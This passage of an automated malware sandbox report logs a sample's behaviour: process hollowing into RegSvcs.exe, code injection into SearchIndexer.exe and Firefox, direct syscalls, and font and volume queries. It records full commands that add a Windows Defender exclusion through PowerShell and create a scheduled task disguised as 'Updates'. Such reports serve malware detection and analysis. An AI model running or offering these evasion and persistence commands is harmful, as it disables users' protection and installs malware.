            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01500BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01500BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01500BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156CBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0150EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01594BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01594BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F0BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F0BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F0A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F0A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155CA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155CA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0158EA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156CA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01504A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01504A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0150EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01514AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01514AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01536ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01536ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01536ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01518A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015B4A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01536AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01578D6B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\SearchIndexer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: read write
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: NULL target: C:\Windows\SysWOW64\SearchIndexer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Thread register set: target process: 8112
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Thread APC queued: target process: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CF3008
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9B0008
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"Jump to behavior
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
